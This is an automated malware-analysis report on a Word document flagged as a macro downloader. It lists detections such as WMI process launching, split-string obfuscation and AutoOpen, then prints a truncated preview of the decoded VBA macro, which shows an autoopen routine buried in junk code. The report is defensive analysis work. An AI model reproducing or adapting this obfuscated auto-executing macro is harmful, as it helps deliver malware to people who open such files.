Verdict: MALICIOUS
Risk Score: 302
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an autoopen subroutine. The macro utilizes obfuscation techniques, including splitting keywords like 'winmgmts', and employs WMI to launch processes, indicating a downloader or dropper functionality. The presence of legacy WordBasic markers and GetObject calls further supports its malicious nature.
Heuristics (8)
- ClamAV (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.00536d-6958656-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- Dangerous API name reassembled from split string literals (critical, OLE_VBA_SPLIT_KEYWORD_OBFUSCATION): VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 39188 bytes |
SHA-256 (macros.bas): 142f25c971f3b3d875ae71f29bc79d24a3194ef558b2e11ab556f0154417d2a3
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "sCUxAAAA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "lG4cwD"
Attribute VB_Base = "0{EBC644D4-E386-413C-908E-8481485EB75E}{EC580E15-8A81-4B78-88AB-84AAC279D031}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "TUUBC1A"
Attribute VB_Base = "0{3167F5AA-0D09-48E8-85A9-2ACA6C93CB70}{EEF0353F-884E-4D91-BC63-4F5627EB9542}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "MxwAUDA"
Sub autoopen()
If HU41ADUZ = L4AZXAUU Then
ElseIf tCUAcc4C = RAAUUAQ Then
PBQUB_UZ = Hex(JADBBxwx + CSng(C_AGUA / Tan(970737797 + 556162569)))
ElseIf nCAoxXDQ = dZADAAAU Then
ZAAcAAAk = Atn(679437309) + Int(131615049)
ElseIf zAkwUXQA = tBABAAA Then
ODo1AZ = 448721800 + Atn(136639462)
End If
If GXAAADA_ = kAcAAQ Then
ElseIf hXAxZAA = iC1cDU Then
DAQBAQ = Hex(XCZA1Q + CSng(HxAQDU_ / Tan(462506023 + 246436896)))
ElseIf a4w44o4 = bAZA4oAZ Then
pkAABDG = Atn(326522074) + Int(129585114)
ElseIf D4AXAQw = NUA4oDZ4 Then
hcA4XA = 883858803 + Atn(693918168)
End If
jQAAxZ_
If FQBXU_U = UZUo1BAA Then
ElseIf bAoQXAB = JAAx1G Then
rCACwUBA = Hex(MD1xBBA + CSng(KAUDBAD / Tan(289954362 + 68963466)))
ElseIf UXoAAUA = iADcA4 Then
IDwQAX = Atn(192828462) + Int(178883383)
ElseIf I4kDQBU = XGwXAQ Then
HUUAcBDk = 722919832 + Atn(361484891)
End If
If EAGG1A1 = iwxAD_ Then
ElseIf BQBQQD = vUAQAA_A Then
VDQ4kA = Hex(jABoAc + CSng(JQwUBB_ / Tan(747333040 + 376130019)))
ElseIf PABA4AA = iAGUUDU Then
CcADAB = Atn(691073589) + Int(205421895)
ElseIf t4AwQBD = twkUAwAA Then
OXAAGA4 = 820586426 + Atn(212776036)
End If
End Sub
Function KwDCUk(JUAAAAAA)
If YAGAXU = woAAAD Then
ElseIf PBDBXkA = fAZ1A1k Then
NwBwACZC = Hex(oGXoAAk + CSng(rDDUDBB / Tan(648705149 + 949573156)))
ElseIf iAC1BAQD = DAZDQAA Then
zADQCAA = Atn(495369129) + Int(231476101)
ElseIf PBDAQB = CAQxXCQA Then
qxAQDoQ = 217618812 + Atn(159211596)
End If
If X41CAAc = jAAUZx Then
ElseIf rQAUAQ = OQDCUwxo Then
KcGB4A = Hex(PDxAQ1A + CSng(TocxD_ / Tan(169904674 + 341042040)))
ElseIf UZAAQQ1 = iAADQxw_ Then
zAADXA = Atn(9222619) + Int(949679386)
ElseIf aQwDQw = P_1wZcAQ Then
JxBxUkwQ = 361956331 + Atn(147205240)
End If
Set KwDCUk = CVar(JUAAAAAA)
If DDAZAcBB = LxcxxAQ Then
ElseIf HoAx_Qxc = J_xAA_4Z Then
MU4XAQCw = Hex(zC_Q4o + CSng(ocAcoA / Tan(555200342 + 907486524)))
ElseIf rQUA4A = OAUCBAAZ Then
A_k11B = Atn(710272978) + Int(195646544)
ElseIf aUAUAA = pXDAAB Then
RBU4ADA = 332618772 + Atn(894355665)
End If
If PAADAC = cA1Q1A_ Then
ElseIf ZAGAxAAB = vGxQwA Then
Vw_GAQZ = Hex(fGQAAoAA + CSng(z1AAQw / Tan(863611492 + 19546555)))
ElseIf JDxGAAD = JAADAGAA Then
pQU44A = Atn(334802405) + Int(489768733)
ElseIf XoQQkUQG = jZcxAAAA Then
SDABAQ__ = 418002456 + Atn(23872221)
End If
If HQCBXko1 = VAU4Xx Then
ElseIf GUUQAB = LU_AAw1 Then
sU1CkBA = Hex(UBAxAA1 + CSng(SxDADwB / Tan(903309971 + 473274309)))
ElseIf FXCxxAA = zoAcAX Then
K4AA1ACD = Atn(210664378) + Int(814378656)
ElseIf TwDc__ = ux_AB4Z Then
ToXAoU = 876606067 + Atn(79912719)
End If
End Function
Attribute VB_Name = "MBAU__A"
Function jQAAxZ_()
On Error Resume Next
If CAABAAoX = jBXGABBZ Then
ElseIf AQ4AGAcD = ZXZAAx Then
vZ4AG
... (truncated)